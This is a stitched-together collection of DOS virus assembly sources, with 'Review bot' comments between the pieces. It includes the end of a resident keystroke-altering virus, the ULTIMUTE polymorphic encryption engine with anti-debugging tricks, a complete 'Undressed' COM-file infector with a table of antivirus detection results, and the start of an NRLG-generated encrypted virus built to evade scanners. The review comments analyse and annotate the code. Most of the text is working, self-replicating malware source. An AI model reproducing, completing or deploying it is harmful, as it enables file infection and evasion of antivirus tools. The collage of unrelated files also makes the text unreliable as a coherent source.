BP027C: MOV AL,CS:[SI+OFFSET BP015E-BP0274] ; Get a byte
MOV CS:[DI],AL ; Store in new location
INC SI ; Next input position
INC DI ; Next output position
LOOP BP027C ; Repeat to end of area
POP SI
XOR CX,CX ; \ Address zero
MOV ES,CX ; /
ASSUME ES:VECTOR
MOV CX,CS:[SI-14H] ; \ Restore Int 21H offset
MOV BW0084,CX ; /
MOV CX,CS:[SI-12H] ; \ Restore Int 21H segment
MOV BW0086,CX ; /
MOV CX,CS:[SI-0BH] ; \ Restore Int 20H offset
MOV BW0080,CX ; /
MOV CX,CS:[SI-9] ; \ Restore Int 20H segment
MOV BW0082,CX ; /
MOV CX,0100H ; \ Install moved area as Int 16H
MOV BW0058,CX ; /
ASSUME ES:NOTHING
POP ES
POP SI
POP DI
POP CX
RET
; Test system for infection
BP02BE: PUSH AX
XOR AL,AL ; Clear register
MOV AH,0DDH ; Infection test function
INT 16H ; Keyboard I/O
CMP AL,AH ; Are they the same
JNE BP02CB ; Branch if not
POP AX
RET
; Install interrupts
BP02CB: PUSH BX
PUSH SI
PUSH ES
MOV DX,[SI+16H] ; Get generation count
CALL BP02D4 ; \ Get current address
BP02D4: POP SI ; /
PUSH BX
PUSH ES
MOV BX,0040H ; \ Address system RAM
MOV ES,BX ; /
ASSUME ES:RAM
MOV BX,BW046C ; Get system clock, low word
MOV CS:[SI+DW0171-BP02D4],BX ; Get system clock, low word
MOV CS:[SI+DW0173-BP02D4],BX ; Get system clock, low word
ASSUME ES:NOTHING
POP ES
POP BX
MOV [SI+DW0175-BP02D4],DX ; Save generation count
XOR AX,AX ; \ Address zero
MOV ES,AX ; /
ASSUME ES:VECTOR
MOV AX,BW0084 ; \ Save Int 21H offset (DW0260)
MOV CS:[SI-74H],AX ;
MOV AX,BW0086 ; \ Save Int 21H segment (DW0262)
MOV CS:[SI-72H],AX ;
MOV AX,BW0058 ; \ Save Int 16H offset (DW016D)
MOV CS:[SI+0FE99H],AX ; /
MOV AX,BW005A ; \ Save Int 16H segment (DW016F)
MOV CS:[SI+0FE9BH],AX ; /
MOV AX,BW0080 ; \ Save Int 20H offset (DW0269)
MOV CS:[SI-6BH],AX ; /
MOV AX,BW0082 ; \ Save Int 20H segment (DW026B)
MOV CS:[SI-69H],AX ; /
CLI
PUSH CS ; \ Set Int 21H segment
POP BW0086 ; /
MOV BW0084,SI ; \ Set Int 21H offset (BP023C)
SUB BW0084,0098H ; /
PUSH CS ; \ Set Int 20H segment
POP BW0082 ; /
MOV BW0080,SI ; \ Set Int 20H offset (BP0264)
SUB BW0080,70H ; /
PUSH CS ; \ Set Int 16H segment
POP BW005A ; /
MOV BW0058,SI ; \ Set Int 16H offset (BP015E)
SUB BW0058,0176H ; /
STI
ASSUME ES:NOTHING
POP ES
POP SI
POP BX
POP AX
RET
ENDADR EQU $
CODE ENDS
END

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
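Review bot: The comment `; Load?` on `CMP AH,4CH` (and `; Fake a load` at BP0264) mislabels DOS function 4Ch, which is terminate-with-return-code; together with the AH=0 test and the Int 20h hook this means the resident install in BP0246 runs when the host program terminates, not when one is loaded, so the lines should read `CMP AH,4CH ; Terminate with return code?` and `MOV AX,4C00H ; Fake a terminate`. In BP02CB the three lines after `MOV ES,BX` all carry `; Get system clock, low word`, but the second and third store the clock into DW0171/DW0173 as the initial keystroke timestamps. BP01D8, the Int 16h AH=0 path, is the payload and has no description: after the real BIOS call it compares the clock against the previous keystroke's tick count and, when the pace test and the counter at DW0175 (seeded from the generation count) allow it, looks the returned character up in the 97-byte DB0177 table (the `MOV CX,0061H` loop) and substitutes the following entry — the 'typo'; a header comment saying so would help an analyst. `MOV BX,AX ; Move actual offset (? not used)` can be confirmed dead, since BX is reloaded from [SI+10H] before the next INT 21H.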

@ -0,0 +1,584 @@
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; The ULTImate MUTation Engine .93á (c) 1993 Black Wolf Enterprises
; pardon the title, had to think of something... }-)
;
;ULTIMUTE is a mutation engine written for security-type applications and
;other areas where mutation of executable code is necessary. For my personal
;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
;using it to encrypt the code placed onto EXE's and COM's to protect them
;from simple modification and/or unauthorized use. The encryption algorithms
;themselves are terribly simple - the main point being that they change
;each time and are difficult to trace through. This engine is written mainly
;to keep a "hack one, hack 'em all" approach from working on protected code,
;rather than to keep the code secure by a cryptologist's point of view.
;
;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
; code, largely variable size for decoder. Also includes variable
; calling segmentation (i.e. CS<>ES<>DS, and can be called via
; near call, far call, or interrupt, the last of which can be
; useful as a memory-resident handler for multiple programs to
; use).
;
;Note: Please - this program and it's source have been released as freeware,
; but do NOT use the mutation engine in viruses! For one thing, the
; decryptor sequence has several repetitive sequences that can be scanned
; for, and for another, that just isn't what it was designed for and
; I would NOT appreciate it. If you MUST use someone else's mutation
; engine for such, use the TPE or MTE. I do NOT condone such, however.
;
;Any modifications made to this program should be listed below the solid line,
;along with the name of the programmer and the date the file was changed.
;Also - they should be commented where changed. If at all possible, report
;modifications to file to the address listed in the documentation.
;
;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
;resulting from the use/misuse of this program. The user agrees to hold
;the author harmless for any consequences that may occur directly or
;indirectly from the use of this program by utilizing this program/file
;in any manner. Please use the engine with care.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Modifications:
; None as of yet (original release version)
.model tiny
.radix 16
.code
public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
;Underscores are used so that these routines can be called from C and other
;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
;need to add underscores in their names as well. Also, the random number
;generations may not be sound for all purposes. They do the job for this
;program, but they may/may not be mathematically correct.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ENTRY:
; CX=Code Length BX=New_Entry_Point
; DS:SI=Code AX=Calling Style
; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
;
;RETURN:
; CX=New Size ES:DI = Same, now contains encrypted code
; w/decryptor
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_ULTMUTE:
push bp ax bx cx dx es ds si di
call Get_Our_Offset
Offset_Mark:
inc cx
inc cx
mov word ptr cs:[bp+1+Set_Size],cx
mov word ptr cs:[Start_Pos+bp],bx
call Init_Rand
call Get_Base_Reg
call Setup_Choices
call Create_EncDec
call Copy_Decrypt_Code
call Encrypt_It
Ending_ULTMUTE:
pop di si ds es dx cx bx ax
add cx,cs:[Decryptor_Length+bp]
inc cx
inc cx
pop bp
cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
je Int_Call
cmp ax,2
je Far_Call
Near_Call:
retn
Far_Call:
retf
Int_Call:
iret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Our_Offset:
mov bp,sp
mov bp,ss:[bp] ;This trick finds our current offset
sub bp,offset Offset_Mark ;from the compiling point, as it
ret ;is usually not constant....
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Init_Rand:
push ax ds
xor ax,ax
mov ds,ax
mov ax,ds:[46c] ;Get seed from timer click at
pop ds ;0000:046c
mov cs:[rand_seed+bp],ax
pop ax
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Rand:
push cx dx
mov ax,cs:[rand_seed+bp]
mov cx,0deadh
mul cx ;This probably isn't a good algorithm,
xor ax,0dada ;(understatement) but it works for
ror ax,1 ;our purposes in this application.
mov cs:[rand_seed+bp],ax
pop dx cx
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
rand_seed dw 0
Base_Reg db 0
Base_Pointer db 0
Start_Pos dw 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Base_Reg:
call Get_Rand
and ax,11b
cmp al,1 ;Eliminate CX for loop purposes
je Get_Base_Reg
mov byte ptr cs:[bp+Base_Reg],al
Do_Pointer_Reg:
call Get_Rand
shr al,1
jc Done_Base_Reg
mov byte ptr cs:[bp+Base_Pointer],0
ret
Done_Base_Reg:
mov byte ptr cs:[bp+Base_Pointer],1
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Setup_Choices:
push ds si
push cs
pop ds
mov si,bp
call Get_Rand
mov word ptr [si+Xor_It+2],ax ;Randomize Xor
call Get_Rand
mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
mov word ptr [si+Dummy7+2],ax
call Get_Rand ;Randomize Add/Sub
mov word ptr [si+Dummy4+2],ax
mov word ptr [si+Dummy8+2],ax
call Get_Rand
mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
mov byte ptr [si+Rand_Byte2],ah
call Get_Rand
mov byte ptr [si+Rand_Byte3],al
mov byte ptr [si+Rand_Byte4],ah
call Get_Rand
mov byte ptr [si+Rand_Byte5],al
mov byte ptr [si+Rand_Byte6],ah
call Get_Rand
mov byte ptr [si+Rand_Byte7],al
mov byte ptr [si+Rand_Byte8],ah
call Get_Rand
mov byte ptr [si+Rand_Byte9],al
mov byte ptr [si+Rand_Byte10],ah
mov al,byte ptr [si+Base_Reg]
Set_Switcher:
and byte ptr [si+Switcher+1],0e6 ;Delete Register
mov ah,al
shl ah,1
shl ah,1
shl ah,1
or byte ptr [Switcher+1+si],ah
Set_Switcher_Pointer:
push ax
mov al,byte ptr [si+Base_Pointer]
or byte ptr [si+Switcher+1],al
Set_Set_Pointy:
and byte ptr [si+Set_Pointy],0fe
or byte ptr [si+Set_Pointy],al
and byte ptr [si+Inc_Pointy],0fe
or byte ptr [si+Inc_Pointy],al
and byte ptr [si+Inc_Pointy+1],0fe
or byte ptr [si+Inc_Pointy+1],al
pop ax
Set_Xorit:
and byte ptr [si+Xor_It+1],0fc
or byte ptr [si+Xor_It+1],al
Set_Flip_It:
and byte ptr [si+Flip_It+1],0e4
or byte ptr [si+Flip_It+1],al
or byte ptr [si+Flip_It+1],ah
Set_Rotate_It:
and byte ptr [si+do_rotate+1],0fc
or byte ptr [si+do_rotate+1],al
and byte ptr [si+do_rot2+1],0fc
or byte ptr [si+do_rot2+1],al
Set_IncDec:
and byte ptr [si+inc_bx_com],0fc
or byte ptr [si+inc_bx_com],al
and byte ptr [si+dec_bx_com],0fc
or byte ptr [si+dec_bx_com],al
and byte ptr [si+Dummy5],0fc
or byte ptr [si+Dummy5],al
and byte ptr [si+Dummy6],0fc
or byte ptr [si+Dummy6],al
Set_AddSub:
and byte ptr [si+Dummy3+1],0fc
and byte ptr [si+Dummy4+1],0fc
or byte ptr [si+Dummy3+1],al
or byte ptr [si+Dummy4+1],al
and byte ptr [si+Dummy7+1],0fc
and byte ptr [si+Dummy8+1],0fc
or byte ptr [si+Dummy7+1],al
or byte ptr [si+Dummy8+1],al
pop si ds
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Create_EncDec:
push es di cx
push cs
pop es
lea di,[bp+Encrypt_Sequence]
call Get_Rand
and ax,1fh
shr ax,1 ;Insure odd number of encryptors to prevent
shl ax,1 ;things like "INC AX / DEC AX" to leave prog
inc ax ;unencrypted.
mov byte ptr cs:[bp+Encrypt_Length],al
xchg cx,ax
Make_Pattern:
call Get_Rand
and ax,7
stosb
loop Make_Pattern
pop cx di es
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Copy_Decrypt_Code:
push si di bx cx ds
push bx di ;save for loop
push cs
pop ds
lea si,[bp+Set_Pointy]
movsw
movsb
lodsb ;Copy initial encryptor
movsw
movsb
lodsb
movsw
mov cl,byte ptr cs:[bp+Encrypt_Length]
xor ch,ch
lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
Dec_Set_Loop:
push cx
lodsb
push si ;Create the Decryptor from Sequence
mov bl,al
xor bh,bh
shl bx,1
add bx,bp
add bx,offset Command_Table
mov ax,cs:[bx]
mov cl,ah
xor ah,ah
lea si,[Xor_It+bp]
add si,ax
repnz movsb
pop si
pop cx
loop Dec_Set_Loop
lea si,[Switcher+bp]
movsw
lodsb ;Finish off Decryptor
movsw
lodsb
movsw ;Loop Setup
movsw
pop si bx
mov ax,di ;Set Loop
sub ax,si ;Do size of loop and offset from loop
mov cs:[Decryptor_Length+bp],ax
push ax ;Changed for Jump
not ax
add ax,5
stosw
pop ax
add bx,ax ;Set initial Pointer
mov es:[si+1],bx
mov ax,di
pop ds cx bx di si
push si di bx cx
Copy_Prog:
push ax
sub ax,di
add ax,bx
mov word ptr es:[di+1],ax
pop ax
mov di,ax
repnz movsb
pop cx bx di si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Encrypt_It:
push bx cx di si
call set_seqp
mov ax,cs:[Decryptor_Length+bp]
inc ax
inc ax
add di,ax ;DI=start of code to be encrypted
;CX=Length of code to encrypt
mov si,di
push es
pop ds
Big_Enc_Loop:
push cx
call Switcher
mov cx,cs:[Encrypt_Length+bp]
Encrypt_Value:
push ax bx cx dx si di
mov si,cs:[Save_SI+bp]
dec si
mov bl,cs:[si] ;??
mov cs:[Save_SI+bp],si
lea si,cs:[Com_Table_2+bp]
xor bh,bh
shl bx,1
add si,bx
mov bx,cs:[si]
add bx,bp
mov word ptr cs:[Next_Command+bp],bx
pop di si dx cx bx ax
call cs:[Next_Command+bp]
Loop Encrypt_Value
pop cx
call Switcher
call Inc_Pointy
call set_seqp
loop Big_Enc_Loop
pop si di cx bx
ret
Save_SI dw 0
Next_Command dw 0
set_seqp:
push si
lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
mov cs:[Save_SI+bp],SI
pop si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Command_Table: ;8 commands -> 3 bits.
db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
Com_Table_2:
dw [offset Xor_It]
dw [offset Flip_It]
dw [offset Rotate_It_2]
dw [offset Rotate_It_1]
dw [offset Dummy5]
dw [offset Dummy6]
dw [offset Dummy7]
dw [offset Dummy8]
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Set_Pointy:
mov di,1234 ;Pointer to Code
ret
Set_Size:
mov cx,1234 ;Size
ret
Switcher:
xchg bx,[di]
ret
Inc_Pointy:
inc di
inc di
ret
Loop_Mut:
dec cx
jz End_Loop_Mut
loop_set:
jmp _ULTMUTE
End_Loop_Mut:
ret
Xor_It:
xor bx,1234
ret
Flip_It:
xchg bh,bl
ret
Rotate_It_1:
jmp before_rot
do_rotate:
ror bx,1
jmp after_rot
before_rot:
push ax
call Ports1
pop ax
jmp do_rotate
Ports1:
in al,21
or al,02
out 21,al
ret
Ports2:
in al,21
xor al,02
out 21,al
ret
after_rot:
push ax
call ports2
pop ax
ret
Rotate_It_2:
cli
jmp confuzzled1
do_rot2:
rol bx,1
call Switch_Int_1_3
jmp donerot2
confuzzled1:
call Switch_Int_1_3
jmp do_rot2
Switch_Int_1_3:
push ax ds
xor ax,ax
mov ds,ax
jmp short exch1
db 0eah
exch1:
xchg ax,word ptr ds:[4]
jmp short exch2
db 9ah
exch2:
xchg ax,word ptr ds:[0c]
xchg ax,word ptr ds:[4]
pop ds ax
ret
donerot2:
ret
Dummy1:
jmp short inc_bx_com ;Kill Disassemblers
db 0ea
Rand_Byte1:
db 0ea
inc_bx_com:
inc bx
ret
Dummy2:
jmp short Kill_1
Rand_Byte2:
db 0ea
Cont_Kill1:
cli
xchg ax,ds:[84]
xchg ax,ds:[84]
sti
pop ds ax
dec_bx_com:
dec bx
jmp short quit_Kill1
Kill_1:
push ax ds
xor ax,ax
mov ds,ax ;Anti-Debugger (Kills Int 21)
jmp short Cont_Kill1
Rand_Byte3:
db 0e8
quit_Kill1:
ret
Dummy3:
add bx,1234
push bx
call throw_debugger
Rand_Byte4:
db 0e8 ;Prefetch Trick
into_throw:
sub bx,offset Rand_Byte4
add byte ptr [bx+trick_em+1],0ba
trick_em:
jmp short done_trick
Rand_Byte5:
db 0ea
throw_debugger:
pop bx
jmp short into_throw
Rand_Byte6:
db 0ea
done_trick:
sub byte ptr [bx+trick_em+1],0ba
pop bx
ret
Dummy4:
sub bx,1234
jmp short Get_IRQ
Rand_Byte7 db 0e8
Kill_IRQ:
out 21,al
xor al,2
jmp short Restore_IRQ
Rand_Byte8 db 0e8
Rand_Byte9 db 0e8 ;This will kill the keyboard
Get_IRQ: ;IRQ
push ax
in al,21
xor al,2
jmp short Kill_IRQ
Rand_Byte10 db 0e8
Restore_IRQ:
out 21,al
pop ax
ret
;The following are used for the encryption algorithm to reverse commands that
;include anti-tracing.
Dummy5:
dec bx
ret
Dummy6:
inc bx
ret
Dummy7:
sub bx,1234
ret
Dummy8:
add bx,1234
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Decryptor_Length dw 0
Encrypt_Length dw 0
Encrypt_Sequence db 30 dup(0)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_END_ULTMUTE:
end _ULTMUTE
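Review bot: `.radix 16` at the top makes every unsuffixed literal hexadecimal — `mov cx,0deadh`, `xor ax,0dada`, `in al,21`, `Encrypt_Sequence db 30 dup(0)` (48 bytes), `and byte ptr [si+Switcher+1],0e6` — which is easy to misread in a listing this dense; a comment beside the directive, `.radix 16 ; all bare numbers below are hex (21 = port 21h, 30 dup = 48 bytes)`, would prevent that. Com_Table_2 is the inverse-operation table used by Encrypt_It and deserves saying so: its entries 2 and 3 are deliberately swapped relative to Command_Table (ROL undoes ROR) and entries 4–7 point at Dummy5–Dummy8, the plain inverses of Dummy1–Dummy4 without the anti-trace wrapping, e.g. `Com_Table_2: ; inverse of Command_Table at the same index; used by the encryptor`. The header lists only 'Anti-Tracing abilities', but the emitted decryptor also writes the real-mode interrupt vector table (0:4 and 0:0C in Switch_Int_1_3, 0:84 in Cont_Kill1), masks IRQ1 at the 8259 (`out 21,al` in Ports1/Kill_IRQ/Restore_IRQ) and patches its own bytes (`add byte ptr [bx+trick_em+1],0ba`); a reader of the header should know this, since it is what makes the output unusable under a protected-mode host and what emulating scanners flag.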

@ -0,0 +1,126 @@
; Virus: The Undressed Virus
; Author: Arsonic[Codebreakers]
; Type: Appending
; Encryption: No
;
; Displays a Message on Feb 5th.
; Btw.. I Love Lisa..!
;---------------------------------------------------------------------------------------------------
; AV-Product | Detected? | Comments
;---------------------------------------------------------------------------------------------------
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
; AVP | VCL.824 | VCL! ARRGGGHH!
;----------------------------------------------------------------------------------------------------
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;kill heristics
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
mov cx,3
nop
mov di,100h
nop
lea si,[bp+buffer]
nop
rep movsb
find_first:
mov ah,4ch
add ah,2
nop
find_next:
nop
lea dx,[bp+filemask]
nop
int 21h
jnc infect
jmp check_payload
infect:
mov ax,3d02h
mov dx,9eh
int 21h
xchg ax,bx
mov ah,3dh
add ah,2
mov cx,3
lea dx,[bp+buffer]
int 21h
mov ax,word ptr[80h + 1ah]
nop
sub ax,end - start + 3
nop
cmp ax,word ptr[bp+buffer+1]
nop
je close_file
mov ax,word ptr[80h + 1ah]
nop
sub ax,3
nop
mov word ptr[bp+three+1],ax
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+three]
nop
mov cx,3
nop
int 21h
mov ax,4202h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+start]
nop
mov cx,end - start
nop
int 21h
close_file:
mov ah,3ch
add ah,2
int 21h
mov ah,4dh
add ah,2
jmp find_next
check_payload:
mov ah,2ah
int 21h
cmp dh,2 ;is it febuary?
je next
jmp close
next:
cmp dl,5 ;the 5th?
je payload ;yes.. display the message
jmp close ;no.. return control to the program.
payload:
mov ah,9h ;display message
lea dx,[bp+message]
int 21h
int 00h ;get keypress
int 16h
int 20h ;return to dos.
close:
mov di,100h ;return control to program
jmp di
three db 0e9h,0,0
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
buffer db 0cdh,20h,0
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
author db 'Arsonic[CB]',0 ; nice scan string..
message db 'Happy Birthday Lisa!',10,13,'$'
Lisa db 'I LOVE U LISA!',0
end:
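Review bot: The comment `;get keypress` on `int 00h` in the payload is wrong: vector 0 is the CPU divide-error exception, not a keyboard service, and the `int 16h` that follows is issued with whatever AH the preceding `int 21h` left (AH=09h from the display call), so neither instruction is a documented wait-for-key; replace it with `int 00h ; divide-error vector, not a keyboard call` and note the unset AH on the `int 16h`. Every DOS call after the first is built as `mov ah,NN / add ah,2` (4Ch→4Eh find-first, 3Dh→3Fh read, 3Eh→40h write, 3Ch→3Eh close, 4Dh→4Fh find-next), which leaves the effective function invisible at each site; a trailing comment naming it, e.g. `mov ah,4ch ; +2 = 4Eh, find first`, would make the listing readable. `mov ax,word ptr[80h + 1ah]` reads the matched file's size from the default DTA at PSP:80h and `mov dx,9eh` addresses its name there, and neither offset is named anywhere in the file.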

@ -0,0 +1,473 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿsub byte ptr [di],087h
inc word ptr [di]
xor byte ptr [di],022h
inc word ptr [di]
xor byte ptr [di],030h
add byte ptr [di],075h
xor byte ptr [di],061h
sub byte ptr [di],0b9h
xor word ptr [di],0e185h
add word ptr [di],0aa17h
not word ptr [di]
inc byte ptr [di]
inc word ptr [di]
xor word ptr [di],0c3d7h
sub word ptr [di],04a83h
not byte ptr [di]
xor word ptr [di],06acdh
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
